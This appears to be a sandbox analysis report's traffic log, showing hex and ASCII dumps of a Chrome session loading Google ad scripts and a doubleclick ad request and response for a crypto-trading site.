                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1390INData Raw: 6b 3d 3d 6e 75 6c 6c 29 7b 67 3d 6e 75 6c 6c 3b 62 72 65 61 6b 20 61 7d 67 3d 6b 7d 76 61 72 20 6e 3d 67 26 26 67 5b 36 31 30 34 30 31 33 30 31 5d 3b 66 3d 6e 21 3d 6e 75 6c 6c 3f 6e 3a 21 31 3b 76 61 72 20 70 3b 63 6f 6e 73 74 20 74 3d 65 2e 6e 61 76 69 67 61 74 6f 72 3b 70 3d 74 3f 74 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 7c 7c 6e 75 6c 6c 3a 6e 75 6c 6c 3b 66 75 6e 63 74 69 6f 6e 20 75 28 61 29 7b 72 65 74 75 72 6e 20 66 3f 70 3f 70 2e 62 72 61 6e 64 73 2e 73 6f 6d 65 28 28 7b 62 72 61 6e 64 3a 62 7d 29 3d 3e 62 26 26 62 2e 69 6e 64 65 78 4f 66 28 61 29 21 3d 2d 31 29 3a 21 31 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 76 28 61 29 7b 76 61 72 20 62 3b 61 3a 7b 69 66 28 62 3d 65 2e 6e 61 76 69 67 61 74 6f 72 29 69 66 28 62 3d 62 2e 75 73 65 72 41 67 65
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: k==null){g=null;break a}g=k}var n=g&&g[610401301];f=n!=null?n:!1;var p;const t=e.navigator;p=t?t.userAgentData||null:null;function u(a){return f?p?p.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function v(a){var b;a:{if(b=e.navigator)if(b=b.userAge
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1390INData Raw: 2c 71 29 3d 3e 7b 69 66 28 71 29 63 3d 61 2b 28 22 26 22 2b 62 2b 22 3d 22 2b 63 29 3b 65 6c 73 65 7b 76 61 72 20 6d 3d 22 26 22 2b 62 2b 22 3d 22 3b 6c 65 74 20 72 3d 61 2e 69 6e 64 65 78 4f 66 28 6d 29 3b 72 3c 30 3f 63 3d 61 2b 6d 2b 63 3a 28 72 2b 3d 6d 2e 6c 65 6e 67 74 68 2c 6d 3d 61 2e 69 6e 64 65 78 4f 66 28 22 26 22 2c 72 29 2c 63 3d 6d 3e 3d 30 3f 61 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 72 29 2b 63 2b 61 2e 73 75 62 73 74 72 69 6e 67 28 6d 29 3a 61 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 72 29 2b 63 29 7d 72 65 74 75 72 6e 20 63 2e 6c 65 6e 67 74 68 3e 36 45 34 3f 64 21 3d 3d 76 6f 69 64 20 30 3f 4d 28 61 2c 62 2c 64 2c 76 6f 69 64 20 30 2c 71 29 3a 61 3a 63 7d 3b 76 61 72 20 4e 3d 77 69 6e 64 6f 77 3b 6c 65 74 20 4f 3d 6e 75 6c 6c 3b 66 75 6e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ,q)=>{if(q)c=a+("&"+b+"="+c);else{var m="&"+b+"=";let r=a.indexOf(m);r<0?c=a+m+c:(r+=m.length,m=a.indexOf("&",r),c=m>=0?a.substring(0,r)+c+a.substring(m):a.substring(0,r)+c)}return c.length>6E4?d!==void 0?M(a,b,d,void 0,q):a:c};var N=window;let O=null;fun
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1390INData Raw: 74 60 3b 53 26 26 55 28 29 26 26 53 2e 6d 61 72 6b 28 62 29 3b 72 65 74 75 72 6e 20 61 7d 65 6e 64 28 61 29 7b 69 66 28 74 68 69 73 2e 69 26 26 74 79 70 65 6f 66 20 61 2e 76 61 6c 75 65 3d 3d 3d 22 6e 75 6d 62 65 72 22 29 7b 61 2e 64 75 72 61 74 69 6f 6e 3d 28 51 28 29 7c 7c 50 28 29 29 2d 61 2e 76 61 6c 75 65 3b 76 61 72 20 62 3d 60 67 6f 6f 67 5f 24 7b 61 2e 6c 61 62 65 6c 7d 5f 24 7b 61 2e 75 6e 69 71 75 65 49 64 7d 5f 65 6e 64 60 3b 53 26 26 55 28 29 26 26 53 2e 6d 61 72 6b 28 62 29 3b 21 74 68 69 73 2e 69 7c 7c 74 68 69 73 2e 67 2e 6c 65 6e 67 74 68 3e 20 32 30 34 38 7c 7c 74 68 69 73 2e 67 2e 70 75 73 68 28 61 29 7d 7d 7d 3b 63 6f 6e 73 74 20 61 61 3d 5b 44 2c 45 2c 47 2c 46 2c 43 2c 42 28 22 6d 61 72 6b 65 74 22 29 2c 42 28 22 69 74 6d 73 22 29 2c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: t`;S&&U()&&S.mark(b);return a}end(a){if(this.i&&typeof a.value==="number"){a.duration=(Q()||P())-a.value;var b=`goog_${a.label}_${a.uniqueId}_end`;S&&U()&&S.mark(b);!this.i||this.g.length> 2048||this.g.push(a)}}};const aa=[D,E,G,F,C,B("market"),B("itms"),
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1390INData Raw: 3d 62 29 7d 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 64 61 74 61 2d 6a 63 3d 22 35 33 22 20 64 61 74 61 2d 6a 63 2d 76 65 72 73 69 6f 6e 3d 22 72 32 30 32 34 31 30 30 39 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 76 61 72 20 61 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: =b)}};}).call(this);</script><script data-jc="53" data-jc-version="r20241009">(function(){'use strict';var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1390INData Raw: 28 3b 74 68 69 73 2e 6c 2e 6c 65 6e 67 74 68 3b 29 74 68 69 73 2e 6c 2e 73 68 69 66 74 28 29 28 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 28 61 2c 62 29 7b 74 68 69 73 2e 74 79 70 65 3d 61 3b 74 68 69 73 2e 67 3d 74 68 69 73 2e 74 61 72 67 65 74 3d 62 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 3d 21 31 7d 3b 76 61 72 20 66 61 2c 74 3b 61 3a 7b 66 6f 72 28 76 61 72 20 68 61 3d 5b 22 43 4c 4f 53 55 52 45 5f 46 4c 41 47 53 22 5d 2c 76 3d 6d 2c 69 61 3d 30 3b 69 61 3c 68 61 2e 6c 65 6e 67 74 68 3b 69 61 2b 2b 29 69 66 28 76 3d 76 5b 68 61 5b 69 61 5d 5d 2c 76 3d 3d 6e 75 6c 6c 29 7b 74 3d 6e 75 6c 6c 3b 62 72 65 61 6b 20 61 7d 74 3d 76 7d 76 61 72 20 6a 61 3d 74 26 26 74 5b 36 31 30 34 30 31 33 30 31 5d 3b 66 61 3d 6a 61 21 3d 6e 75 6c 6c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: (;this.l.length;)this.l.shift()()};function r(a,b){this.type=a;this.g=this.target=b;this.defaultPrevented=!1};var fa,t;a:{for(var ha=["CLOSURE_FLAGS"],v=m,ia=0;ia<ha.length;ia++)if(v=v[ha[ia]],v==null){t=null;break a}t=v}var ja=t&&t[610401301];fa=ja!=null
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1390INData Raw: 5b 5d 2c 74 68 69 73 2e 68 2b 2b 29 3b 76 61 72 20 67 3d 75 61 28 61 2c 62 2c 64 2c 66 29 3b 67 3e 2d 31 3f 28 62 3d 61 5b 67 5d 2c 63 7c 7c 28 62 2e 6f 3d 21 31 29 29 3a 28 62 3d 6e 65 77 20 70 61 28 62 2c 74 68 69 73 2e 73 72 63 2c 65 2c 21 21 64 2c 66 29 2c 62 2e 6f 3d 63 2c 61 2e 70 75 73 68 28 62 29 29 3b 72 65 74 75 72 6e 20 62 7d 3b 66 75 6e 63 74 69 6f 6e 20 76 61 28 61 2c 62 29 7b 76 61 72 20 63 3d 62 2e 74 79 70 65 3b 69 66 28 63 20 69 6e 20 61 2e 67 29 7b 76 61 72 20 64 3d 61 2e 67 5b 63 5d 2c 66 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 64 65 78 4f 66 2e 63 61 6c 6c 28 64 2c 62 2c 76 6f 69 64 20 30 29 2c 65 3b 28 65 3d 66 3e 3d 30 29 26 26 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 70 6c 69 63 65 2e 63 61 6c 6c 28 64 2c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: [],this.h++);var g=ua(a,b,d,f);g>-1?(b=a[g],c||(b.o=!1)):(b=new pa(b,this.src,e,!!d,f),b.o=c,a.push(b));return b};function va(a,b){var c=b.type;if(c in a.g){var d=a.g[c],f=Array.prototype.indexOf.call(d,b,void 0),e;(e=f>=0)&&Array.prototype.splice.call(d,


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          45192.168.2.749769142.250.185.1944432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:36 UTC2243OUTGET /pagead/ads?client=ca-pub-2542884292174911&output=html&adk=1812271804&adf=3025194257&abgtt=3&lmt=1728897154&plaf=1%3A2%2C2%3A2%2C7%3A2&plat=1%3A128%2C2%3A128%2C3%3A128%2C4%3A128%2C8%3A128%2C9%3A32776%2C16%3A8388608%2C17%3A32%2C24%3A32%2C25%3A32%2C30%3A1081344%2C32%3A32%2C41%3A32%2C42%3A32&format=0x0&url=https%3A%2F%2Fald.my.id%2F&pra=7&wgl=1&aihb=0&asro=0&ailel=1~2~4~6~7~8~9~10~11~12~13~14~15~16~17~18~19~20~21~24~29~30~34&aiael=1~2~4~6~7~8~9~10~11~12~13~14~15~16~17~18~19~20~21~24~29~30~34&aicel=33&aifxl=29_18~30_19&aiixl=29_5~30_6&aslmct=0.7&asamct=0.7&aiict=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzQiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTM0Il0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzQiXV0sMF0.&dt=1728897152747&bpp=5&bdt=1835&idt=2179&shv=r20241009&mjsv=m202410080101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&prev_fmts=243x600%2C300x250&nras=1&correlator=2303771533125&frm=20&pv=1&u_tz=-240&u_his=1&u_h=1024&u_w=1280&u_ah= [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                          Host: googleads.g.doubleclick.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC759INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:36 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: cafe
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: test_cookie=CheckForPermission; expires=Mon, 14-Oct-2024 09:27:36 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 14 Oct 2024 09:12:36 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC631INData Raw: 32 66 31 34 0d 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 61 70 63 6e 66 20 3d 20 27 7b 22 67 6f 6f 67 4d 73 67 54 79 70 65 22 3a 22 61 70 63 6e 66 22 2c 22 63 6f 6e 66 69 67 22 3a 22 5b 5b 5b 5b 6e 75 6c 6c 2c 30 2c 6e 75 6c 6c 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 5c 5c 22 44 49 56 2e 73 69 74 65 2d 69 6e 66 6f 5c 5c 5c 22 5d 2c 34 2c 5b 5c 5c 5c 22 31 30 70 78 5c 5c 5c 22 2c 5c 5c 5c 22 31 30 70 78 5c 5c 5c 22 2c 74 72 75 65 5d 2c 5b 35 5d 2c 6e 75 6c 6c 2c 5b 5d 2c 5b 5d 2c 31 2c 5b 5d 2c 5b 5d 2c 5b 5d 5d 2c 5b 5b 6e 75 6c 6c 2c 30 2c 6e 75 6c 6c 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 5c 5c 22 44 49 56 2e 66 6f 6f 74 65 72 2d 63 6f 6e 74 61 69 6e 65 72 5c 5c 5c 5c 75 30 30 33 65 44 49 56 2e 63 6f 6e 74 61 69 6e 65 72 5c 5c 5c 22 5d 2c 31 2c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 2f14<script>var apcnf = '{"googMsgType":"apcnf","config":"[[[[null,0,null,[],null,null,\\\"DIV.site-info\\\"],4,[\\\"10px\\\",\\\"10px\\\",true],[5],null,[],[],1,[],[],[]],[[null,0,null,[],null,null,\\\"DIV.footer-container\\\\u003eDIV.container\\\"],1,
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1390INData Raw: 5c 22 31 30 70 78 5c 5c 5c 22 2c 66 61 6c 73 65 5d 2c 5b 30 5d 2c 6e 75 6c 6c 2c 5b 5d 2c 5b 5d 2c 31 2c 5b 5d 2c 5b 36 5d 2c 5b 5d 5d 2c 5b 5b 6e 75 6c 6c 2c 30 2c 6e 75 6c 6c 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 5c 5c 22 44 49 56 23 66 6f 6f 74 65 72 2d 63 6f 6e 74 65 6e 74 5c 5c 5c 22 5d 2c 34 2c 5b 5c 5c 5c 22 31 30 70 78 5c 5c 5c 22 2c 5c 5c 5c 22 31 30 70 78 5c 5c 5c 22 2c 74 72 75 65 5d 2c 5b 35 5d 2c 6e 75 6c 6c 2c 5b 5d 2c 5b 5d 2c 31 2c 5b 5d 2c 5b 5d 2c 5b 5d 5d 2c 5b 5b 6e 75 6c 6c 2c 30 2c 6e 75 6c 6c 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 5c 5c 22 44 49 56 23 67 6d 72 2d 6d 61 69 6e 2d 6c 6f 61 64 5c 5c 5c 5c 75 30 30 33 65 41 52 54 49 43 4c 45 2e 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 2e 67 6d 72 2d 62 6f 78 2d 63 6f 6e 74 65 6e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: \"10px\\\",false],[0],null,[],[],1,[],[6],[]],[[null,0,null,[],null,null,\\\"DIV#footer-content\\\"],4,[\\\"10px\\\",\\\"10px\\\",true],[5],null,[],[],1,[],[],[]],[[null,0,null,[],null,null,\\\"DIV#gmr-main-load\\\\u003eARTICLE.item-content.gmr-box-conten
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1390INData Raw: 6f 78 2d 63 6f 6e 74 65 6e 74 2e 69 74 65 6d 2d 69 6e 66 69 6e 69 74 65 2e 67 6d 72 2d 73 6d 61 6c 6c 74 68 75 6d 62 2e 63 6c 65 61 72 66 69 78 2e 70 6f 73 74 2e 74 79 70 65 2d 70 6f 73 74 2e 73 74 61 74 75 73 2d 70 75 62 6c 69 73 68 2e 66 6f 72 6d 61 74 2d 73 74 61 6e 64 61 72 64 2e 68 61 73 2d 70 6f 73 74 2d 74 68 75 6d 62 6e 61 69 6c 2e 68 65 6e 74 72 79 2e 63 61 74 65 67 6f 72 79 2d 74 72 61 64 69 6e 67 2e 74 61 67 2d 63 72 79 70 74 6f 2e 74 61 67 2d 63 72 79 70 74 6f 2d 74 72 61 64 69 6e 67 2e 74 61 67 2d 70 6c 61 74 66 6f 72 6d 73 2e 74 61 67 2d 74 72 61 64 69 6e 67 5c 5c 5c 22 5d 2c 34 2c 5b 5c 5c 5c 22 31 30 70 78 5c 5c 5c 22 2c 5c 5c 5c 22 31 30 70 78 5c 5c 5c 22 2c 66 61 6c 73 65 5d 2c 5b 30 5d 2c 6e 75 6c 6c 2c 5b 5d 2c 5b 5d 2c 31 2c 5b 5d 2c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ox-content.item-infinite.gmr-smallthumb.clearfix.post.type-post.status-publish.format-standard.has-post-thumbnail.hentry.category-trading.tag-crypto.tag-crypto-trading.tag-platforms.tag-trading\\\"],4,[\\\"10px\\\",\\\"10px\\\",false],[0],null,[],[],1,[],
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1390INData Raw: 6f 76 65 72 6e 6d 65 6e 74 73 2e 74 61 67 2d 72 65 67 75 6c 61 74 69 6f 6e 73 2e 74 61 67 2d 74 72 61 64 69 6e 67 5c 5c 5c 22 5d 2c 34 2c 5b 5c 5c 5c 22 31 30 70 78 5c 5c 5c 22 2c 5c 5c 5c 22 31 30 70 78 5c 5c 5c 22 2c 66 61 6c 73 65 5d 2c 5b 30 5d 2c 6e 75 6c 6c 2c 5b 5d 2c 5b 5d 2c 31 2c 5b 5d 2c 5b 36 5d 2c 5b 5d 5d 2c 5b 5b 6e 75 6c 6c 2c 30 2c 6e 75 6c 6c 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 5c 5c 22 44 49 56 23 67 6d 72 2d 6d 61 69 6e 2d 6c 6f 61 64 5c 5c 5c 5c 75 30 30 33 65 41 52 54 49 43 4c 45 2e 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 2e 67 6d 72 2d 62 6f 78 2d 63 6f 6e 74 65 6e 74 2e 69 74 65 6d 2d 69 6e 66 69 6e 69 74 65 2e 67 6d 72 2d 73 6d 61 6c 6c 74 68 75 6d 62 2e 63 6c 65 61 72 66 69 78 2e 70 6f 73 74 2e 74 79 70 65 2d 70 6f 73 74 2e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: overnments.tag-regulations.tag-trading\\\"],4,[\\\"10px\\\",\\\"10px\\\",false],[0],null,[],[],1,[],[6],[]],[[null,0,null,[],null,null,\\\"DIV#gmr-main-load\\\\u003eARTICLE.item-content.gmr-box-content.item-infinite.gmr-smallthumb.clearfix.post.type-post.
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1390INData Raw: 5d 2c 5b 36 5d 2c 5b 5d 5d 2c 5b 5b 6e 75 6c 6c 2c 30 2c 6e 75 6c 6c 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 5c 5c 22 44 49 56 2e 67 6d 72 2d 74 6f 70 6e 6f 74 69 66 69 63 61 74 69 6f 6e 5c 5c 5c 22 5d 2c 31 2c 5b 5c 5c 5c 22 31 30 70 78 5c 5c 5c 22 2c 5c 5c 5c 22 31 30 70 78 5c 5c 5c 22 2c 74 72 75 65 5d 2c 5b 32 5d 2c 6e 75 6c 6c 2c 5b 5d 2c 5b 5d 2c 31 2c 5b 5d 2c 5b 5d 2c 5b 5d 5d 2c 5b 5b 6e 75 6c 6c 2c 30 2c 6e 75 6c 6c 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 5c 5c 22 44 49 56 23 67 6d 72 2d 6d 61 69 6e 2d 6c 6f 61 64 5c 5c 5c 5c 75 30 30 33 65 41 52 54 49 43 4c 45 2e 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 2e 67 6d 72 2d 62 6f 78 2d 63 6f 6e 74 65 6e 74 2e 69 74 65 6d 2d 69 6e 66 69 6e 69 74 65 2e 67 6d 72 2d 73 6d 61 6c 6c 74 68 75 6d 62 2e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ],[6],[]],[[null,0,null,[],null,null,\\\"DIV.gmr-topnotification\\\"],1,[\\\"10px\\\",\\\"10px\\\",true],[2],null,[],[],1,[],[],[]],[[null,0,null,[],null,null,\\\"DIV#gmr-main-load\\\\u003eARTICLE.item-content.gmr-box-content.item-infinite.gmr-smallthumb.
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1390INData Raw: 63 61 74 65 67 6f 72 79 2d 74 72 61 64 69 6e 67 2e 74 61 67 2d 63 61 74 63 68 2e 74 61 67 2d 63 72 79 70 74 6f 2e 74 61 67 2d 63 72 79 70 74 6f 2d 74 72 61 64 69 6e 67 2e 74 61 67 2d 67 6f 76 65 72 6e 6d 65 6e 74 73 2e 74 61 67 2d 72 65 67 75 6c 61 74 69 6f 6e 73 2e 74 61 67 2d 74 72 61 64 69 6e 67 5c 5c 5c 5c 75 30 30 33 65 44 49 56 2e 69 74 65 6d 2d 61 72 74 69 63 6c 65 5c 5c 5c 22 5d 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 5c 5c 22 44 49 56 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 2d 61 72 63 68 69 76 65 5c 5c 5c 22 5d 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 5c 5c 22 44 49 56 2e 65 6e 74 72
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: category-trading.tag-catch.tag-crypto.tag-crypto-trading.tag-governments.tag-regulations.tag-trading\\\\u003eDIV.item-article\\\"],[null,null,null,[],null,null,\\\"DIV.entry-content.entry-content-archive\\\"],null,[null,null,null,[],null,null,\\\"DIV.entr
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1390INData Raw: 6f 61 64 5c 5c 5c 5c 75 30 30 33 65 41 52 54 49 43 4c 45 2e 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 2e 67 6d 72 2d 62 6f 78 2d 63 6f 6e 74 65 6e 74 2e 69 74 65 6d 2d 69 6e 66 69 6e 69 74 65 2e 67 6d 72 2d 73 6d 61 6c 6c 74 68 75 6d 62 2e 63 6c 65 61 72 66 69 78 2e 70 6f 73 74 2e 74 79 70 65 2d 70 6f 73 74 2e 73 74 61 74 75 73 2d 70 75 62 6c 69 73 68 2e 66 6f 72 6d 61 74 2d 73 74 61 6e 64 61 72 64 2e 68 61 73 2d 70 6f 73 74 2d 74 68 75 6d 62 6e 61 69 6c 2e 68 65 6e 74 72 79 2e 63 61 74 65 67 6f 72 79 2d 74 72 61 64 69 6e 67 2e 74 61 67 2d 63 72 79 70 74 6f 2e 74 61 67 2d 63 72 79 70 74 6f 2d 74 72 61 64 69 6e 67 2e 74 61 67 2d 66 75 74 75 72 65 2e 74 61 67 2d 69 6e 64 75 73 74 72 79 2e 74 61 67 2d 6c 65 61 64 65 72 73 2e 74 61 67 2d 70 72 65 64 69 63 74 69 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: oad\\\\u003eARTICLE.item-content.gmr-box-content.item-infinite.gmr-smallthumb.clearfix.post.type-post.status-publish.format-standard.has-post-thumbnail.hentry.category-trading.tag-crypto.tag-crypto-trading.tag-future.tag-industry.tag-leaders.tag-predictio
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC1390INData Raw: 63 6c 65 5c 5c 5c 22 5d 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 5c 5c 22 44 49 56 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 2d 61 72 63 68 69 76 65 5c 5c 5c 22 5d 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 5c 5c 22 44 49 56 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 2d 61 72 63 68 69 76 65 2c 48 45 41 44 45 52 2e 65 6e 74 72 79 2d 68 65 61 64 65 72 5c 5c 5c 22 5d 5d 2c 5b 5b 6e 75 6c 6c 2c 32 2c 6e 75 6c 6c 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 5c 5c 22 44 49 56 2e 65 6e 74 72 79 2d 6d 61 69 6e 2d 73 69 6e 67 6c 65 5c 5c 5c 5c 75 30 30 33 65 50 5c 5c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: cle\\\"],[null,null,null,[],null,null,\\\"DIV.entry-content.entry-content-archive\\\"],null,[null,null,null,[],null,null,\\\"DIV.entry-content.entry-content-archive,HEADER.entry-header\\\"]],[[null,2,null,[],null,null,\\\"DIV.entry-main-single\\\\u003eP\\
